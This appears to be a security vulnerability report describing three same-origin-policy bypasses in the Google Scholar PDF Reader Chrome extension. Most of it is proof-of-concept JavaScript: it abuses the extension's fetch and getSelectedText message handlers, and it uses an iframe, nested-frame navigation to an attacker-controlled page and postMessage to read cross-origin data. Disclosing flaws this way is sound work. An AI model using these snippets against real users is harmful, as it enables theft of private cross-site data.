Summary:
SOP bugs in Google Scholar PDF Reader
Product:
Google Scholar
URL:
https://chromewebstore.google.com/detail/google-scholar-pdf-reader/dahenjhkoodjbpjheillcadbppiidmhp
Vulnerability type:
Site Isolation Bypass
Details
--- BUG 1 (With compromised renderer) ---
// In the context of a content script on any website.
// Leaked data must be JSON parsable.
let x = chrome.runtime.connect();
x.postMessage({type: 'fetch', method: 'GET', url: '
https://www.google.com/something.json'
, id: 1});
x.onMessage.addListener(console.log);
--- BUG 2 (Without compromised renderer) ---
// Embed victim PDF from attacker page.
let f=document.createElement('iframe');
f.width=1000;
f.height=1000;
f.src='
https://services.google.com/fh/files/misc/bvp_order_form_google_06162020.pdf'
;
document.body.appendChild(f);
// Navigate nested, nested frame to attacker controled page with null origin.
f.contentWindow[0][0].location = '
https://terjanq.me/xss.php?h[Content-Security-Policy]=sandbox%20allow-scripts'
// I think this also creates a race condition version
// On that attacker page, Make sure target page to leak is same-origin as the pdf
https://services.google.com
in this case.
onmessage = async (e) => {
let reader = e.data.body.pipeThrough(new TextDecoderStream()).getReader();
let result = await reader.read();
console.log(result.value);
}
parent.parent.postMessage({type: 'fetch', url: '
https://services.google.com/example'}
, '*');
--- BUG 3 (Without compromised renderer) ---
Selected text gets leaked cross-origin.
onmessage=console.log;
f.contentWindow[0].postMessage({type: 'getSelectedText'}, '*');
Attack scenario
An attacker controlled website can bypass SOP if one of the follow is met:
Attacker wants JSON data and has a compromised renderer bug
Attacker wants data from a origin that contains a PDF which allows embedding
Extension owner of Google LLC has verified scholar.google.com the contact is
scholar-chrome-extensions@google.com